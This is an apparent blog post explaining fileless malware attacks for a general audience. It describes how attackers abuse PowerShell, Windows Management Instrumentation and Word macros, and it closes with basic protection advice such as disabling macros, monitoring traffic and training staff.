Non-malware attacks are on the rise, but how do we protect against them? Majority of cyber incidents reported in 2017 are non-malware based, yet many are not even aware they exist. According to a study by the Ponemon Institute, 77 percent of compromised attacks organizations faced in 2017 were fileless. The report estimates that fileless attacks are ten times more likely to succeed than file-based attacks. Beware in 2018, this number may increase by 35 percent.
What are non-malware attacks?
Non-malware also known as fileless attacks, zero-footprint attacks, or macro attacks are a type of cyber attack in which an attacker uses existing software or allows (remote access) applications and authorized protocols to carry out malicious activities on your network. Non-malware attacks do not require any installation of any software on a victim’s technology. Simply, hackers evade whitelisting. Only approved applications can be installed with whitelisting. Hackers have found a way to turn Windows against itself and carry out fileless attacks using built-in Windows tools.
Instead of dropping custom tools that could be flagged as malware, hackers use the tools that already exist on the device, so antivirus tools are more likely to miss them. Then the takeover of a legitimate system process occurs and runs malicious code in its memory space.
How do non-malware attacks usually happen?
- A user opens an infected email or visits infected site
- An exploit kit scans the computer for vulnerabilities and uses them for inserting malicious code into one of Windows system administration tools
- Fileless malware runs its payload in an available DLL and starts the attack in the memory, hiding within a legitimate Windows process
What are the characteristics of fileless malware?
- Have no identifiable code or signature that allows typical tools to detect it. It also does not have a specific behaviour; therefore, scanners cannot detect it.
- Lives in your computers’ RAM. Known as memory-based malware
- Uses processes that are native to the operating system you are using to carry out the attack
- Maybe paired with other types of malware
- May be able to circumvent application whitelisting, a process that allows only approved applications to be installed on a machine. Fileless malware takes advantage of approved applications that are already on your system
Be sure to watch for unusual network patterns and traces, such as your computer connecting to botnet servers. Look for signs of compromise in system memory as well as other artifacts that may have been left behind from malicious code.
Type of non-malware attack targets:
- Windows Management Instrumentation (VMI)
How do non-malware attacks work?
Fileless malware attacks take default Windows tools, particularly PowerShell and Windows Management Instrumentation (VMI), and uses them for malicious activity. Fileless malware leverages the applications already installed on a user’s computer, applications that are known to be safe. For example, exploit kits can target browser vulnerabilities to make the browser run malicious code, or take advantage of Microsoft Word macros, or use Microsoft’s PowerShell utility. PowerShell and VMI are an adversaries’ tools of choice since they are installed on every Windows machine, capable of carrying out commands and are incorporated into the daily workflow of many IT professionals, making banning them impossible.
For example, if you were to see a banner ad and click on it, not knowing it was a malware advertisement. You would then be redirected to a malicious site that loads flash. Flash utilizes the Windows PowerShell tool to execute commands using the command line while it’s running in memory. PowerShell then downloads and executes malicious code from a botnet or other compromised server that looks for data to send to hackers.
Common types of non-malware attacks:
Fileless persistence methods – the malicious code continues to run even after the system reboot. For example, malicious scripts may be stored in the Windows registry and re-start the infection after reboot
Memory-only threats – the attack executes its payload in the memory by exploiting vulnerabilities
Dual-use tools – the existing Windows systems tools are used for malicious purposes
Non-Portable Executable (PE) file attacks – a type of dual-use tool attack that uses legitimate Windows tools and applications as well as such scripts as PowerShell, CScript or WScript
Best practices for fileless malware protection
Navigating the changing threat landscapes and tackling sophisticated fileless malware can be daunting for many organizations. However, there are a few things that you can do to protect yourselves against invisible threats and detect techniques.
- Restrict unnecessary management frameworks
- Disable macros
- Monitor unauthorized traffic
- Make sure end users know how to be secure and safe when connecting/provide training
- Use next-generation endpoint security solutions
- Keep software current and patches up to date
Fileless malware is now pointing to the direction where cyber threats are heading. The complexity of this non-malware is indicating that businesses are likely unprepared to handle the risks. Fileless attacks are continuing to rise because they are difficult to detect by anti-malware solutions. While these memory-based attacks are 10 times more likely to succeed than file-based malware. Organizations should create a strategy, including both endpoint security solutions and employee training, to combat these threats.